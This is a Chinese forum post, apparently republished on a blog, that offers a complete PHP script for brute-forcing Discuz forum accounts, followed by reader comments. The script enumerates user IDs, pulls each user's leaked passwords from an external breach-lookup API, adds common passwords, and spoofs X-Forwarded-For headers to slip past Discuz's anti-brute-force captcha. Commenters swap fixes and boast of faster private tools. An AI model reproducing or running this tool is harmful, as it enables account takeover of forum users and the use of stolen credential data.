<?php
class fuckdz{

  public function sgk($user){
    $a=file_get_contents("http://www.soyun.org/cha_api.php?so=$user&auto=");
      $a=iconv("UTF-8", "GB2312//IGNORE", $a);
    preg_match_all("/7%\">(.*)</isU",$a,$arr);
    unset($arr[0]);
    foreach ($arr as $key=>$r){
      return $r;
      }
  }

  public function getuid($host,$uid){
       $a=file_get_contents("$host/home.php?mod=space&do=profile&from=space&&uid=$uid");
       if(!strpos($a,"charset=gbk")){
      $a=iconv("UTF-8", "GB2312//IGNORE", $a);
      }

      preg_match("/<title>(.*)的/isU",$a,$arr);
      $a=str_replace("\r","",trim($arr[1]));
      return $a=str_replace("\n","",$a);
  }

  public function is_pass($host,$user,$pass){
      $ip= rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244).'.'.rand(100, 244);
       $opts = array (
      'http' => array (
      'method' => 'GET',
      'header'=> "User-Agent: Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile\r\nReferer:http://www.baidu.com/index.php\r\nX-Forwarded-For: $ip\r\nCookie: xx=xx",
       'timeout'=>15, )
      );

      $context = stream_context_create($opts);
       $a=file_get_contents("$host/member.php?mod=logging&action=login&loginsubmit=yes&infloat=yes&lssubmit=yes&inajax=1&handlekey=ls&quickforward=yes&username=$user&password=$pass",false,$context);
       if(strpos($a,"window.location.href")){
        return true;
      }else{
        return false;
      }

  }
  public function crack($host,$a,$b){
  $host=str_replace("http://","",$host);
  $host="http://".$host."/";

  for($vip=$a;$vip<=$b;$vip++){

    $user=$this->getuid($host,$vip);
    $pass=$this->sgk($user);
    array_push($pass,"123456");
    array_push($pass,"654321");
    array_push($pass,"123123");
    array_push($pass,"woaini");
    array_push($pass,"caonima");
    array_push($pass,"12345");
    array_push($pass,"12345789");
    array_push($pass,"5201314");
    array_push($pass,"1314520");
    array_push($pass,$user);
    array_push($pass,$user."123456");
    array_push($pass,"abc123");
    array_push($pass,$user."..");

      for($i=0;isset($pass[$i]);$i++){
        echo "\r\n正在爆破UID:$vip-[".$user."]---".$pass[$i]."";
        if($this->is_pass($host,$user,$pass[$i])){
            echo "爆破成功!";
            break;
            file_put_contents("ok.txt", $user."---".$pass[$i]."\r\n",FILE_APPEND);
           }else{
            echo "爆破失败";
          }

        }

    }

  }

}
$f=new fuckdz();
error_reporting(0);
set_time_limit(0);

if(empty($argv[1])){
print_r("
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

      开始爆破:php.exe $argv[0] 网址 起始uid 结束uid
      示例: php.exe $argv[0] http://phpinfo.me/ 1 255
      结果保存在ok.txt里
      Blog:http://phpinfo.me

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++   \n\n\n
 ");
}else{

if(!empty($argv[1])){

    $f->crack($argv[1],$argv[2],$argv[3]);
  }else{
    echo "逗比";
}

}
?>

开启手机验证码就不行了...

Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本

[原文地址]

相关讨论:

1#

Siro | 2014-06-02 08:05

必须收藏……

2#

大白菜 | 2014-06-02 08:11

...不能调用社工库的API爆破?

3#

Sunshie (http://phpinfo.me欢迎友链) | 2014-06-02 08:12

@大白菜 本来就是调用社工库来爆破的

4#

围剿 | 2014-06-02 08:18

好东西 这个必须收藏!!亮点是社工库api啊。。

5#

小威 (呵呵复呵呵,女神敲回车!) | 2014-06-02 08:27

已收藏

6#

围剿 | 2014-06-02 09:09

@Sunshie api能用?我测试的api无效呢。

7#

侠之心 | 2014-06-02 10:36

Discuz 爆破无视验证码,PHP 调用社工库暴破 Discuz 论坛账户脚本

我全部爆破失败了 凑

8#

null (#) | 2014-06-02 11:30

这么屌?

9#

Sunshie (http://phpinfo.me欢迎友链) | 2014-06-02 11:31

@侠之心 修改了下..http://phpinfo.me/2014/06/02/630.html

10#

stranger_1 (i am a stranger) | 2014-06-02 11:40

73,74行 对换 不然就看不到ok.txt 喽··

11#

thx | 2014-06-02 11:44

没法无视验证码啊

12#

侠之心 | 2014-06-02 11:51

@Sunshie 楼主 还是全部都是爆破失败

13#

侠之心 | 2014-06-02 11:54

@Sunshie 系不系这几个社工库不给力啊

14#

侠之心 | 2014-06-02 11:57

@stranger_1 正解

15#

null (#) | 2014-06-02 12:12

@stranger_1 换了也没看见传说中的ok.txt

16#

小胖子 (VIP你快回来,园长欺负我!) | 2014-06-02 12:14

给力

17#

phith0n (www.leavesongs.com) | 2014-06-02 12:32

没多线程速度怎么保证?

我有个py脚本用了很久了,速度快成功率高,不过我才不会发出来,哈哈~~

18#

′ 雨。 | 2014-06-02 12:48

@phith0n 我擦 师傅咋没给我说过。

19#

侠之心 | 2014-06-02 12:52

@null 那是因为没有成功一个 所以没出来 ok.txt

20#

侠之心 | 2014-06-02 12:53

@phith0n 。。。。。。。。。。。。。

求私聊 给脚本

21#

null (#) | 2014-06-02 12:58

@侠之心 生成在根目录了,现在看见了。

22#

侠之心 | 2014-06-02 13:09

@null 我还没成功过 凑

23#

LauRen (不登高山,不知天之高也;不临深溪,不知地之厚也。) | 2014-06-02 13:25

mark

留言评论(旧系统):

z @ 2014-06-16 10:12:50

为啥能无视验证码。

本站回复:

看脚本呗~

z @ 2014-06-16 10:24:01

真没看出来

本站回复:

那就继续看

z @ 2014-06-16 10:30:06

his XML file does not appear to have any style information associated with it. The document tree is shown below. <root> <![CDATA[ <h3 class="flb"><em>提示信息</em><span><a href="javascript:;" class="flbc" onclick="hideWindow('ls');" title="关闭">关闭</a></span></h3> <div class="c altw"> <div class="alert_error"><script type="text/javascript" reload="1">if(typeof errorhandle_ls=='function') {errorhandle_ls('', {'type':' ]]> <![CDATA[ 1'});}</script><script type="text/javascript">showWindow('login', 'member.php?mod=logging&action=login&auth=65c7A1wNxxxxxxxxxxvcF2OzARtHVu8cQzZop9wW9wkzCTbiRL&referer=http%3A%2F%2Fwww.xx.cn%2F.%2F')</script></div> </div> <p class="o pns"> <button type="button" class="pn pnc" id="closebtn" onclick="hideWindow('ls');"><strong>确定</strong></button> <script type="text/javascript" reload="1">if($('closebtn')) {$('closebtn').focus();}</script> </p> ]]> </root>

本站回复:

?

z @ 2014-06-16 11:26:24

明白了,这里说的 无视验证码,原来是 突破dz的防爆破机智,而不是爆破本身就存在验证码登陆的网站

本站回复:

Good good study, day day up~